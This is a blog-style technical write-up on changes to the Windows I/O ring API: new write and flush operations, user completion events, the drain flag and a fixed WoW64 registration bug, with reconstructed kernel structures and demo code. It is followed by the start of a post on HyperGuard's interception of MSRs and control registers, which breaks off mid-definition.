One Year to I/O Ring: What Changed?

It’s been just over a year since the first version of I/O ring was introduced into Windows. The initial version was introduced in Windows 21H2 and I did my best to document it here, with a comparison to the Linux io_uring here. Microsoft also documented the Win32 functions. Since that initial version the feature has progressed and received some pretty significant changes and updates, so it deserves a follow-up post documenting all of them and explaining them in more detail.

New Supported Operations

Looking at the changes, the first and most obvious thing we can see is that two new operations are now supported – write and flush:

These allow using the I/O ring to perform write and flush operations. These new operations are processed and handled similarly to the read operation that’s been supported since the first version of I/O rings and forwarded to the appropriate I/O functions. New wrapper functions were added to KernelBase.dll to queue requests for these operations: BuildIoRingWriteFile and BuildIoRingFlushFile, and their definitions can be found in the ioringapi.h header file (available in the preview SDK):

STDAPI
BuildIoRingWriteFile (
    _In_ HIORING ioRing,
    IORING_HANDLE_REF fileRef,
    IORING_BUFFER_REF bufferRef,
    UINT32 numberOfBytesToWrite,
    UINT64 fileOffset,
    FILE_WRITE_FLAGS writeFlags,
    UINT_PTR userData,
    IORING_SQE_FLAGS sqeFlags
);

STDAPI
BuildIoRingFlushFile (
    _In_ HIORING ioRing,
    IORING_HANDLE_REF fileRef,
    FILE_FLUSH_MODE flushMode,
    UINT_PTR userData,
    IORING_SQE_FLAGS sqeFlags
);

Similarly to BuildIoRingReadFile, both of these build the submission queue entry with the requested OpCode and add it to the submission queue. Obviously, there are different flags and options needed for the new operations, such as the flushMode for flush operations or writeFlags for writes. To handle that, the NT_IORING_SQE structure now contains a union for the input data that gets interpreted according to the requested OpCode – the new structure is available in the public symbols and also at the end of this post.
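To see how these fit together in practice, here is a hedged sketch of queueing a write followed by a flush. It assumes an HIORING named ioring that was already created with CreateIoRing; the IoRingHandleRefFromHandle and IoRingBufferRefFromPointer helpers and the FILE_WRITE_FLAGS_NONE, FILE_FLUSH_DEFAULT and IOSQE_FLAGS_NONE values are taken from the preview SDK’s ioringapi.h and may still change:

//
// Queue a write of a local buffer at file offset 0, followed by a flush.
// Nothing is sent to the kernel until SubmitIoRing is called.
//
char buffer[512] = "hello ioring";
HANDLE file = CreateFileW(L"out.bin", GENERIC_WRITE, 0, NULL,
                          CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

HRESULT result = BuildIoRingWriteFile(ioring,
                                      IoRingHandleRefFromHandle(file),
                                      IoRingBufferRefFromPointer(buffer),
                                      sizeof(buffer),
                                      0,                      // fileOffset
                                      FILE_WRITE_FLAGS_NONE,
                                      0x1111,                 // userData
                                      IOSQE_FLAGS_NONE);

if (SUCCEEDED(result))
{
    result = BuildIoRingFlushFile(ioring,
                                  IoRingHandleRefFromHandle(file),
                                  FILE_FLUSH_DEFAULT,
                                  0x2222,                     // userData
                                  IOSQE_FLAGS_NONE);
}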

One small kernel change that was added to support write operations can be seen in IopIoRingReferenceFileObject:

There are a few new arguments and an additional call to ObReferenceFileObjectForWrite. Probing of the different buffers across the various functions also changed depending on the operation type.

User Completion Event

Another interesting change is the ability to register a user event to be notified for every new completed operation. Unlike the I/O ring’s CompletionEvent, which only gets signaled when all operations are complete, the new optional user event will be signaled for every newly completed operation, allowing the application to process results as they are written to the completion queue.

To support this new functionality, another system call was created: NtSetInformationIoRing:

NTSTATUS
NtSetInformationIoRing (
    HANDLE IoRingHandle,
    ULONG IoRingInformationClass,
    ULONG InformationLength,
    PVOID Information
);

Like other NtSetInformation* routines, this function receives a handle to the IoRing object, an information class, length and data. Only one information class is currently valid: 1. The IORING_INFORMATION_CLASS enum is unfortunately not in the public symbols so we can’t know what its official name is, but I’ll call it IoRingRegisterUserCompletionEventClass. Even though only one class is currently supported, there might be other information classes supported in the future. One interesting thing here is that the function uses a global array IopIoRingSetOperationLength to retrieve the expected information length for each information class:

The array currently only has two entries: 0, which isn’t actually a valid class and returns a length of 0, and entry 1 which returns an expected size of 8. This length matches the function’s expectation to receive an event handle (HANDLEs are 8 bytes on x64). This could be a hint that more information classes are planned in the future, or just a different coding choice.
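Putting the pieces together, a direct call from user mode would look roughly like the hedged sketch below. The prototype is the one shown above (it isn’t in any public header, so it has to be declared manually and resolved from ntdll.dll; NTSTATUS and NTAPI come from winternl.h), the class value 1 and the 8-byte length match the checks just described, and ioRingHandle stands for the NT handle backing the I/O ring (the first field of the user-mode HIORING wrapper shown at the end of this post):

//
// Hedged sketch only - the information class name is my own invention.
//
typedef NTSTATUS (NTAPI *PFN_NT_SET_INFORMATION_IORING)(
    HANDLE IoRingHandle,
    ULONG IoRingInformationClass,
    ULONG InformationLength,
    PVOID Information);

PFN_NT_SET_INFORMATION_IORING pfnNtSetInformationIoRing =
    (PFN_NT_SET_INFORMATION_IORING)GetProcAddress(
        GetModuleHandleW(L"ntdll.dll"), "NtSetInformationIoRing");

HANDLE userEvent = CreateEventW(NULL, FALSE, FALSE, NULL);
NTSTATUS status = pfnNtSetInformationIoRing(ioRingHandle,
                                            1,               // IoRingRegisterUserCompletionEventClass
                                            sizeof(HANDLE),  // IopIoRingSetOperationLength[1] == 8
                                            &userEvent);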

After the necessary input checks, the function references the I/O ring whose handle was sent to the function. Then, if the information class is IoRingRegisterUserCompletionEventClass, it calls IopIoRingUpdateCompletionUserEvent with the supplied event handle. IopIoRingUpdateCompletionUserEvent will reference the event and place the pointer in IoRingObject->CompletionUserEvent. If no event handle is supplied, the CompletionUserEvent field is cleared:

The RE Corner

On a side note, this function might look rather large and mildly threatening, but most of it is simply synchronization code to guarantee that only one thread can edit the CompletionUserEvent field of the I/O ring at any point and prevent race conditions. And in fact, the compiler makes the function look larger than it actually is since it unpacks macros, so if we try to reconstruct the source code this function would look much cleaner:

NTSTATUS
IopIoRingUpdateCompletionUserEvent (
    PIORING_OBJECT IoRingObject,
    PHANDLE EventHandle,
    KPROCESSOR_MODE PreviousMode
    )
{
    PKEVENT completionUserEvent;
    HANDLE eventHandle;
    NTSTATUS status;
    PKEVENT oldCompletionEvent;
    PKEVENT eventObj;
    KIRQL oldIrql;

    completionUserEvent = 0;
    eventHandle = *EventHandle;
    if (!eventHandle ||
        (eventObj = 0,
        status = ObReferenceObjectByHandle(
                 eventHandle, EVENT_MODIFY_STATE, ExEventObjectType, PreviousMode, &eventObj, 0),
        completionUserEvent = eventObj,
        NT_SUCCESS(status)))
    {
        oldIrql = KeAcquireSpinLockRaiseToDpc(&IoRingObject->CompletionLock);
        oldCompletionEvent = IoRingObject->CompletionUserEvent;
        IoRingObject->CompletionUserEvent = completionUserEvent;
        KeReleaseSpinLock(&IoRingObject->CompletionLock, oldIrql);
        if (oldCompletionEvent)
        {
            ObDereferenceObjectWithTag(oldCompletionEvent, 'tlfD');
        }
        return STATUS_SUCCESS;
    }
    return status;
}

That’s it, around six lines of actual code. But, that is not the point of this post, so let’s get back to the topic at hand: the new CompletionUserEvent.

Back to the User Completion Event

The next time we run into CompletionUserEvent is when an IoRing entry is completed, in IopCompleteIoRingEntry:

While the normal I/O ring completion event is only signaled once all operations are complete, the CompletionUserEvent is signaled under different conditions. Looking at the code, we see the following check:

Every time an I/O ring operation is complete and written into the completion queue, the CompletionQueue->Tail field gets incremented by one (referenced here as newTail). The CompletionQueue->Head field contains the index of the next completion entry to be processed by the application, and gets incremented every time the application processes another entry (if you use PopIoRingCompletion it’ll do that internally, otherwise you need to increment it yourself). So, (newTail - Head) % CompletionQueueSize calculates the number of completed entries that have not yet been processed by the application. If that amount is one, the application has processed all completed entries except the one that is being completed right now. In that case, the function will reference the CompletionUserEvent and then call KeSetEvent to signal it.

This behavior allows the application to follow along with the completion of all its submitted operations by creating a thread whose only purpose is to wait on the user event and process every newly completed entry as soon as it’s completed. This keeps the Head and Tail of the completion queue in sync, so the next entry to be completed will signal the event, the thread will process the entry, and so on. This way the main thread of the application can keep doing other work, while the I/O operations all get processed as soon as possible by the worker thread.

Of course, this is not mandatory. An application might choose to not register a user event and simply wait for the completion of all events. But the two events allow different applications to choose the option that works best for them, creating an I/O completion mechanism that can be adjusted to suit different needs.

There is a function in KernelBase.dll to register the user completion event: SetIoRingCompletionEvent. We can find its signature in ioringapi.h:

STDAPI
SetIoRingCompletionEvent (
    _In_ HIORING ioRing,
    _In_ HANDLE hEvent
);

Using this new API and knowing how this new event operates, we can build a demo application that would look something like this:

HANDLE g_event;

DWORD WINAPI
WaitOnEvent (
    LPVOID lpThreadParameter
    )
{
    HRESULT result;
    IORING_CQE cqe;

    WaitForSingleObject(g_event, INFINITE);
    while (TRUE)
    {
        //
        // lpThreadParameter is the handle to the ioring
        //
        result = PopIoRingCompletion((HIORING)lpThreadParameter, &cqe);
        if (result == S_OK)
        {
            /* do things */
        }
        else
        {
            WaitForSingleObject(g_event, INFINITE);
            ResetEvent(g_event);
        }
    }
    return 0;
}

int
main ()
{
    HRESULT result;
    HIORING ioring = NULL;
    IORING_CREATE_FLAGS flags;
    HANDLE thread;
    DWORD threadId;
    UINT32 submittedEntries;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000, &ioring);

    /* Queue operations to ioring... */

    //
    // Create user completion event, register it to the ioring
    // and create a thread to wait on it and process completed operations.
    // The ioring handle is sent as an argument to the thread.
    //
    g_event = CreateEvent(NULL, FALSE, FALSE, NULL);
    result = SetIoRingCompletionEvent(ioring, g_event);
    thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WaitOnEvent, ioring, 0, &threadId);
    result = SubmitIoRing(ioring, 0, 0, &submittedEntries);

    /* Clean up... */

    return 0;
}

Drain Preceding Operations

The user completion event is a very cool addition, but it’s not the only waiting-related improvement to I/O rings. Another one can be found by looking at the NT_IORING_SQE_FLAGS enum:

typedef enum _NT_IORING_SQE_FLAGS
{
    NT_IORING_SQE_FLAG_NONE = 0x0,
    NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS = 0x1,
} NT_IORING_SQE_FLAGS, *PNT_IORING_SQE_FLAGS;

Looking through the code, we can find a check for NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS right in the beginning of IopProcessIoRingEntry:

This check happens before any processing is done, and tests whether the submission queue entry has the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag set. If so, IopIoRingSetupCompletionWait is called to set up the wait parameters. The function signature looks something like this:

NTSTATUS
IopIoRingSetupCompletionWait (
    _In_ PIORING_OBJECT IoRingObject,
    _In_ ULONG SubmittedEntries,
    _In_ ULONG WaitOperations,
    _In_ BOOL SetupCompletionWait,
    _Out_ PBYTE CompletionWait
);

Inside the function there are a lot of checks and calculations that are both very technical and very boring, so I’ll spare myself the need to explain them and you the need to read through the exhausting explanation and skip to the good parts. Essentially, if the function receives -1 as the WaitOperations, it will ignore the SetupCompletionWait argument and calculate the number of operations that have already been submitted and processed but not yet completed. That number gets placed in IoRingObject->CompletionWaitUntil. It also sets IoRingObject->SignalCompletionEvent to TRUE and returns TRUE in the output argument CompletionWait.

If the function succeeded, IopProcessIoRingEntry will then call IopIoRingWaitForCompletionEvent, which will wait until IoRingObject->CompletionEvent is signaled. Now is the time to go back to the check we’ve seen earlier in IopCompleteIoRingEntry:

If SignalCompletionEvent is set (which it is, because IopIoRingSetupCompletionWait set it) and the number of completed events is equal to IoRingObject->CompletionWaitUntil, IoRingObject->CompletionEvent will get signaled to mark that the pending events are all completed. SignalCompletionEvent also gets cleared to avoid signaling the event again when it’s not requested.

When called from IopProcessIoRingEntry, IopIoRingWaitForCompletionEvent receives a timeout of NULL, meaning that it’ll wait indefinitely. This is something that should be taken into consideration when using the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag.

So to recap, setting the NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS flag in a submission queue entry will make sure all preceding operations are completed before this entry gets processed. This might be needed in certain cases where one I/O operation relies on an earlier one.
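At the Win32 level this maps to the sqeFlags parameter of the Build* functions. A hedged sketch, reusing the ioring and file variables from the earlier example and assuming IOSQE_FLAGS_DRAIN_PRECEDING_OPS is the SDK-level flag that gets translated into NT_IORING_SQE_FLAG_DRAIN_PRECEDING_OPS in the SQE:

//
// Queue a flush that will only be processed once every previously queued
// operation (for example, the writes above) has completed.
//
HRESULT result = BuildIoRingFlushFile(ioring,
                                      IoRingHandleRefFromHandle(file),
                                      FILE_FLUSH_DEFAULT,
                                      0x3333,     // userData
                                      IOSQE_FLAGS_DRAIN_PRECEDING_OPS);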

But waiting on pending operations happens in one more case: When submitting an I/O ring. In my first post about I/O rings last year, I defined the NtSubmitIoRing signature like this:

NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

My definition ended up not being entirely accurate. The more correct name for the third argument would be WaitOperations, so the accurate signature is:

NTSTATUS
NtSubmitIoRing (
    _In_ HANDLE Handle,
    _In_ IORING_CREATE_REQUIRED_FLAGS Flags,
    _In_opt_ ULONG WaitOperations,
    _In_opt_ PLARGE_INTEGER Timeout
    );

Why does this matter? Because the number you pass into WaitOperations isn’t used to process the ring entries (they are processed entirely based on SubmissionQueue->Head and SubmissionQueue->Tail), but to request the number of operations to wait on. So, if WaitOperations is not 0, NtSubmitIoRing will call IopIoRingSetupCompletionWait before doing any processing:

However, it calls the function with SetupCompletionWait=FALSE, so the function won’t actually set up any of the wait parameters, but only perform the sanity checks to see if the number of wait operations is valid. For example, the number of wait operations can’t be higher than the number of operations that were submitted. If the checks fail, NtSubmitIoRing won’t process any of the entries and will return an error, usually STATUS_INVALID_PARAMETER_3.

Later, we see both functions again after operations have been processed:

IopIoRingSetupCompletionWait is called again to recalculate the number of operations that need to be waited on, taking into consideration any operations that might have already been completed (or waited on already if any of the SQEs had the flag mentioned earlier). Then IopIoRingWaitForCompletionEvent is called to wait on IoRingObject->CompletionEvent until all requested events have been completed.
In most cases applications will choose to either send 0 as the WaitOperations argument or set it to the total number of submitted operations, but there may be cases where an application could want to only wait on part of the submitted operations, so it can choose a lower number to wait on.
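At the Win32 level these two arguments are exposed through the waitOperations and milliseconds parameters of SubmitIoRing, so a hedged sketch of waiting on only part of the submitted work might look like this:

UINT32 submittedEntries = 0;

//
// Submit everything that's queued, but only block until two of the submitted
// operations have completed (or until 5 seconds pass). Passing 0 as the
// second argument would return without waiting for any completions.
//
HRESULT result = SubmitIoRing(ioring, 2, 5000, &submittedEntries);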

Looking at Bugs

Comparing the same piece of code in different builds is a fun way of finding bugs that were fixed. Sometimes these are security vulnerabilities that got patched, sometimes just regular old bugs that can affect the stability or reliability of the code. The I/O ring code in the kernel received a lot of modifications over the past year, so this seems like a good chance to go hunting for old bugs.

One bug that I’d like to focus on here is pretty easy to spot and understand, but is a fun example for the way different parts of the system that seem entirely unrelated can clash in unexpected ways. This is a functional (not security) bug that prevented WoW64 processes from using some of the I/O ring features.

We can find evidence of this bug when looking at IopIoRingDispatchRegisterBuffers and IopIoRingDispatchRegisterFiles. When looking at the new build we can see a piece of code that wasn’t there in earlier versions:

This is checking whether the process that is registering the buffers or files is a WoW64 process – a 32-bit process running on top of a 64-bit system. Since Windows now supports ARM64, this WoW64 process can be either an x86 application or an ARM32 one.

Looking further ahead can show us why this information matters here. Later on, we see two cases where isWow64 is checked:

This first case is when the array size is being calculated to check for invalid sizes if the caller is UserMode.

This second case happens when iterating over the input buffer to register the buffers in the array that will be stored in the I/O ring object. In this case it’s slightly harder to understand what we’re looking at because of the way the structures are handled here, but if we look at the disassembly it might become a bit clearer:

The block on the left is the WoW64 case and the block on the right is the native case. Here we can see the difference in the offset that is being accessed in the bufferInfo variable (r8 in the disassembly). To get some context, bufferInfo is read from the submission queue entry:

bufferInfo = Sqe->RegisterBuffers.Buffers;

When registering a buffer, the SQE will contain a NT_IORING_OP_REGISTER_BUFFERS structure:

typedef struct _NT_IORING_OP_REGISTER_BUFFERS
{
    /* 0x0000 */ NT_IORING_OP_FLAGS CommonOpFlags;
    /* 0x0004 */ NT_IORING_REG_BUFFERS_FLAGS Flags;
    /* 0x000c */ ULONG Count;
    /* 0x0010 */ PIORING_BUFFER_INFO Buffers;
} NT_IORING_OP_REGISTER_BUFFERS, *PNT_IORING_OP_REGISTER_BUFFERS;

The sub-structures are all in the public symbols so I won’t put them all here, but the one to focus on in this case is IORING_BUFFER_INFO:

typedef struct _IORING_BUFFER_INFO
{
    /* 0x0000 */ PVOID Address;
    /* 0x0008 */ ULONG Length;
} IORING_BUFFER_INFO, *PIORING_BUFFER_INFO; /* size: 0x0010 */

This structure contains an address and a length. The address is of type PVOID, and this is where the bug lies. A PVOID doesn’t have a fixed size across all systems. It is a pointer, and therefore its size depends on the size of a pointer on the system. On 64-bit systems that’s 8 bytes, and on 32-bit systems that’s 4 bytes. However, WoW64 processes aren’t fully aware that they are running on a 64-bit system. There is a whole mechanism put in place to emulate a 32-bit system for the process to allow 32-bit applications to execute normally on 64-bit hardware. That means that when the application calls BuildIoRingRegisterBuffers to create the array of buffers, it calls the 32-bit version of the function, which uses 32-bit structures and 32-bit types. So instead of using an 8-byte pointer, it’ll use a 4-byte pointer, creating an IORING_BUFFER_INFO structure that looks like this:

typedef struct _IORING_BUFFER_INFO
{
    /* 0x0000 */ PVOID Address;
    /* 0x0004 */ ULONG Length;
} IORING_BUFFER_INFO, *PIORING_BUFFER_INFO; /* size: 0x008 */

This is, of course, not the only case where the kernel receives pointer-sized arguments from a user-mode caller, and there is a mechanism meant to handle these cases. Since the kernel doesn’t support 32-bit execution, the WoW64 emulation layer is in charge of translating system call input arguments from the 32-bit sizes and types to the 64-bit types expected by the kernel. However in this case, the buffer array is not sent as an input argument to a system call. It is written into the shared section of the I/O ring that is read directly by the kernel, never going through the WoW64 translation DLLs. This means no argument translation is done on the array, and the kernel directly reads an array that was laid out for a 32-bit kernel, where the Length field is not at the expected offset. In the early versions of I/O ring this meant that the kernel always skipped the buffer length and interpreted the next entry’s address as the last entry’s length, leading to bugs and errors.

In newer builds, the kernel is aware of the differently shaped structure used by WoW64 processes, and interprets it correctly: It assumes that the size of each entry is 8 bytes instead of 0x10, and reads only the first 4 bytes as the address and the next 4 bytes as the length.
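To make the difference concrete, here is a hedged illustration (not the actual kernel code; the type and variable names are made up, with bufferInfo, count and isWow64 borrowed from the description above) of how the same raw array would be walked for a native caller versus a WoW64 caller:

//
// Native layout: 8-byte pointer + 4-byte length, padded to 0x10 bytes.
// WoW64 layout:  4-byte pointer + 4-byte length, 8 bytes total.
//
typedef struct _BUFFER_INFO_NATIVE {
    ULONG64 Address;
    ULONG Length;
} BUFFER_INFO_NATIVE;            // sizeof == 0x10

typedef struct _BUFFER_INFO_WOW64 {
    ULONG Address;
    ULONG Length;
} BUFFER_INFO_WOW64;             // sizeof == 8

for (ULONG i = 0; i < count; i++)
{
    PVOID address;
    ULONG length;

    if (isWow64)
    {
        BUFFER_INFO_WOW64* entry = (BUFFER_INFO_WOW64*)bufferInfo + i;
        address = (PVOID)(ULONG_PTR)entry->Address;
        length = entry->Length;
    }
    else
    {
        BUFFER_INFO_NATIVE* entry = (BUFFER_INFO_NATIVE*)bufferInfo + i;
        address = (PVOID)entry->Address;
        length = entry->Length;
    }

    //
    // ... probe and register the buffer as before ...
    //
}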

The same issue existed when pre-registering file handles, since a HANDLE is also the size of a pointer. IopIoRingDispatchRegisterFiles now has the same checks and processing to allow WoW64 processes to successfully register file handles as well.

Other Changes

There are a couple of smaller changes that aren’t large or significant enough to receive their own section of this post but still deserve an honorable mention:

  • The successful creation of a new I/O ring object will generate an ETW event containing all the initialization information in the I/O ring.
  • IoRingObject->CompletionEvent received a promotion from a NotificationEvent type to a SynchronizationEvent.
  • The current I/O ring version is 3, so new rings created on recent builds should use this version.
  • Since different versions of I/O ring support different capabilities and operations, KernelBase.dll exports a new function: IsIoRingOpSupported. It receives the HIORING handle and the operation number, and returns a boolean indicating whether the operation is supported on this version (a short usage sketch follows this list).
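Here is a hedged usage sketch of that capability check; IORING_OP_WRITE is assumed to be the IORING_OP_CODE value matching the new write operation:

//
// Only queue write requests if the ring (and the kernel behind it) supports
// the write opcode; older versions only support read and the register operations.
//
if (IsIoRingOpSupported(ioring, IORING_OP_WRITE))
{
    // safe to call BuildIoRingWriteFile here
}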

Data Structures

One more exciting thing happened in Windows 11 22H2 (build 22577): nearly all the internal I/O ring structures are available in the public symbols! This means there is no longer a need to painfully reverse engineer the structures and try to guess the field names and their purposes. Some of the structures received major changes since 21H2, so not having to reverse engineer them all over again is great.

Since the structures are in the symbols there is no real need to add them here. However, structures from the public symbols aren’t always easy to find through a simple Google search – I highly recommend trying GitHub search instead, or just directly using ntdiff. At some point people will inevitably search for some of these data structures, find the REd structures in my old post, which are no longer accurate, and complain that they are out of date. To avoid that at least temporarily, I’ll only post here the updated versions of the structures that I had in the old post but will highly encourage you to get the up-to-date structures from the symbols – the ones here are bound to change soon enough (edit: one build later, some of them already did). So, here are some of the structures from Windows 11 build 22598:

typedef struct _NT_IORING_INFO
{
    IORING_VERSION IoRingVersion;
    NT_IORING_CREATE_FLAGS Flags;
    ULONG SubmissionQueueSize;
    ULONG SubmissionQueueRingMask;
    ULONG CompletionQueueSize;
    ULONG CompletionQueueRingMask;
    PNT_IORING_SUBMISSION_QUEUE SubmissionQueue;
    PNT_IORING_COMPLETION_QUEUE CompletionQueue;
} NT_IORING_INFO, *PNT_IORING_INFO;

typedef struct _NT_IORING_SUBMISSION_QUEUE
{
    ULONG Head;
    ULONG Tail;
    NT_IORING_SQ_FLAGS Flags;
    NT_IORING_SQE Entries[1];
} NT_IORING_SUBMISSION_QUEUE, *PNT_IORING_SUBMISSION_QUEUE;

typedef struct _NT_IORING_SQE
{
    enum IORING_OP_CODE OpCode;
    enum NT_IORING_SQE_FLAGS Flags;
    union
    {
        ULONG64 UserData;
        ULONG64 PaddingUserDataForWow;
    };
    union
    {
        NT_IORING_OP_READ Read;
        NT_IORING_OP_REGISTER_FILES RegisterFiles;
        NT_IORING_OP_REGISTER_BUFFERS RegisterBuffers;
        NT_IORING_OP_CANCEL Cancel;
        NT_IORING_OP_WRITE Write;
        NT_IORING_OP_FLUSH Flush;
        NT_IORING_OP_RESERVED ReservedMaxSizePadding;
    };
} NT_IORING_SQE, *PNT_IORING_SQE;

typedef struct _IORING_OBJECT
{
    USHORT Type;
    USHORT Size;
    NT_IORING_INFO UserInfo;
    PVOID Section;
    PNT_IORING_SUBMISSION_QUEUE SubmissionQueue;
    PMDL CompletionQueueMdl;
    PNT_IORING_COMPLETION_QUEUE CompletionQueue;
    ULONG64 ViewSize;
    BYTE InSubmit;
    ULONG64 CompletionLock;
    ULONG64 SubmitCount;
    ULONG64 CompletionCount;
    ULONG64 CompletionWaitUntil;
    KEVENT CompletionEvent;
    BYTE SignalCompletionEvent;
    PKEVENT CompletionUserEvent;
    ULONG RegBuffersCount;
    PIORING_BUFFER_INFO RegBuffers;
    ULONG RegFilesCount;
    PVOID* RegFiles;
} IORING_OBJECT, *PIORING_OBJECT;

One structure that isn’t in the symbols is the HIORING structure that represents the ioring handle in KernelBase. That one slightly changed since 21H2 so here is the reverse engineered 22H2 version:

typedef struct _HIORING
{
    HANDLE handle;
    NT_IORING_INFO Info;
    ULONG IoRingKernelAcceptedVersion;
    PVOID RegBufferArray;
    ULONG BufferArraySize;
    PVOID FileHandleArray;
    ULONG FileHandlesCount;
    ULONG SubQueueHead;
    ULONG SubQueueTail;
} HIORING, *PHIORING;

Conclusion

This feature only shipped a few months ago, but it’s already receiving some very interesting additions and improvements, aiming to make it more attractive to I/O-heavy applications. It’s already at version 3, and it’s likely we’ll see a few more versions coming in the near future, possibly supporting new operation types or extended functionality. Still, no applications seem to use this mechanism yet, at least on desktop systems.

This is one of the more interesting additions to Windows 11, and just like any new piece of code it still has some bugs, like the one I showed in this post. It’s worth keeping an eye on I/O rings to see how they get used (or maybe abused?) as Windows 11 becomes more widely adopted and applications begin using all the new capabilities it offers.

HyperGuard Part 3 – More SKPG Extents

Hi all! And welcome to part 3 of the HyperGuard chronicles!

In the previous blog post I introduced SKPG extents – the data structures that describe the memory ranges and system components that should be monitored by HyperGuard. So far, I only covered the initialization extent and various types of memory extents, but those are just the beginning. In this post I will cover the rest of the extent types and show how they are used by HyperGuard to protect other areas of the system.

The next extent group to look into is MSR and Control Register extents:

MSR and Control Register Extents

This group contains the following extent types:

  • 0x1003: SkpgExtentMsr
  • 0x1006: SkpgExtentControlRegister
  • 0x100C: SkpgExtentExtendedControlRegister

These extent types are received from the normal kernel, but they are never added into the array at the end of the SKPG_CONTEXT or get validated during the runtime checks that I’ll describe in one of the next posts. Instead, they are used in yet another part of SKPG initialization.

After initializing the SKPG_CONTEXT in SkpgInitializeContext, SkpgConnect performs an IPI (Inter-Processor Interrupt). It does this by calling SkeGenericIpiCall with a target function and input data, which will call the target function on every processor with the requested data. In this case, the target function is SkpgxInstallIntercepts and the input data contains the number of input extents and the matching array:

I will go over intercepts in a lot more detail in a future blog post, but to give some necessary context: SKPG can ask the hypervisor to intercept certain actions in the system, like memory access, register access or instructions. HyperGuard uses that ability to intercept access to certain MSRs and Control Registers (and other things, which I will talk about later) to prevent malicious modifications. HyperGuard uses the input extents to choose which MSRs and Control Registers to intercept, out of the list of accepted options.

Since each processor has its own set of MSRs and registers, HyperGuard needs to intercept the requested ones on all processors. Therefore, SkpgxInstallIntercepts is called through an IPI, to make sure it’s called in the context of each processor.

Once in SkpgxInstallIntercepts, the function iterates over the array of input extents and handles the three types included in this group based on the data supplied in them. If you remember, each extent contains 0x18 bytes of type-specific data. For this group, this data contains the number of the MSR/register to be intercepted as well as the processor number that it should be intercepted on. This means that there might be more than one input extent for each MSR or control register, each for a different processor number. Or MSRs and control registers might only be intercepted on certain processors but not on others, if that is what the normal kernel requested. The data structure in the input extent for MSR and control register extents looks something like this:

typedef struct _MSR_CR_DATA
{
    ULONG64 Mask;
    ULONG64 Value;
    ULONG RegisterNumber;
    ULONG ProcessorNumber;
} MSR_CR_DATA, *PMSR_CR_DATA;

While iterating over the extents, the function checks if the extent type is of one of the three in this group, and if so whether the processor number in the extent matches the current processor. If so, it checks if the number of the MSR or control register matches one of the accepted ones. If the extent matches one of the accepted registers, a mask is fetched from an array in the SKPRCB – this array contains the needed masks for all accepted MSRs and control registers so the hypervisor can be asked to intercept them. All masks are collected, and when all extents have been examined the final mask is sent to ShvlSetRegisterInterceptMasks to be installed. The mask that is used to install the intercepts is the union HV_REGISTER_CR_INTERCEPT_CONTROL. It is documented and can be found here.

Now that the general process is covered, we can look into the accepted MSRs and control registers and understand why HyperGuard might want to protect them from modifications, starting from the MSRs:

SkpgExtentMsr

Patching certain MSRs is a popular operation for exploits and rootkits, allowing them to do things such as hooking system calls or disabling security features. Some of those MSRs are already periodically monitored by PatchGuard, but there are benefits to intercepting them through HyperGuard that I will cover later. The list of MSRs that can be intercepted keeps growing over time and receives new additions as new features and registers get added to CPUs, such as the implementation of CET which added multiple MSRs that might be a target for attackers. As of Windows 11 build 22598, the MSRs that can be intercepted by SKPG are:

  1. IA32_EFER (0xC0000080) – among other things, this MSR contains the NX bit, enforcing a mitigation that doesn’t allow code execution in addresses that aren’t specifically marked as executable. It also contains flags related to virtualization support.
  2. IA32_STAR (0xC0000081) – contains the address of the x86 system call handler.
  3. IA32_LSTAR (0xC0000082) – contains the address of the x64 system call handler – should normally be pointing to nt!KiSystemCall64.
  4. IA32_CSTAR (0xC0000083) – contains the address of the system call handler on x64 when running in compatibility mode – should normally be pointing to nt!KiSystemCall32.
  5. IA32_SFMASK (0xC0000084) – system call flags mask. Any bit set here when a system call is executed will be cleared from EFLAGS.
  6. IA32_TSC_AUX (0xC0000103) – usage depends on the operating system, but this MSR is generally used to store a signature, to be read together with a time stamp.
  7. IA32_APIC_BASE (0x1B) – contains the APIC base address.
  8. IA32_SYSENTER_CS (0x174) – contains the CS value for ring 0 code when performing system calls with SYSENTER.
  9. IA32_SYSENTER_ESP (0x175) – contains the stack pointer for the kernel stack when performing system calls with SYSENTER.
  10. IA32_SYSENTER_EIP (0x176) – contains the EIP value for ring 0 entry when performing system calls with SYSENTER.
  11. IA32_MISC_ENABLE (0x1A0) – controls multiple processor features, such as Fast Strings disable, performance monitoring and disable of the XD (no-execute) bit.
  12. MSR_IA32_S_CET (0x6A2) – controls kernel mode CET setting.
  13. IA32_PL0_SSP (0x6A4) – contains the ring 0 shadow stack pointer.
  14. IA32_PL1_SSP (0x6A5) – contains the ring 1 shadow stack pointer.
  15. IA32_PL2_SSP (0x6A6) – contains the ring 2 shadow stack pointer.
  16. IA32_INTERRUPT_SSP_TABLE_ADDR (0x6A8) – contains a pointer to the interrupt shadow stack table.
  17. IA32_XSS (0xDA0) – contains a mask to be used when the XSAVES and XRSTORS instructions are executed in kernel mode. For example, it controls the saving and loading of the registers used by Intel Processor Trace (IPT).

SkpgExtentControlRegister

By modifying certain control registers an attacker can disable security features or gain control of execution. Currently SKPG supports intercepts of two control registers:

  1. CR0 – controls certain hardware configuration such as paging, protected mode and write protect.
  2. CR4 – controls the configuration of different hardware features. For example, the SMEP, SMAP and UMIP bits control security features that make CR4 an interesting target for attackers using an arbitrary write exploit.

SkpgExtentExtendedControlRegister

Currently only one extended control register exists – XCR0. It’s used to toggle storing or loading of extended registers such as AVX, ZMM and CET registers, and can be intercepted and protected by SKPG.

Installing the Intercepts

Now that we know which registers can be intercepted and why, we can get back and look at the installation of the intercepts through ShvlSetRegisterInterceptMasks. The function receives a HV_REGISTER_CR_INTERCEPT_CONTROL mask to know which intercepts to install, as well as the values for a few of the intercepted registers – CR0, CR4 and the IA32_MISC_ENABLE MSR. These are all placed in a structure that is passed into the function, which looks like this:

typedef struct _REGISTER_INTERCEPT_INFORMATION
{
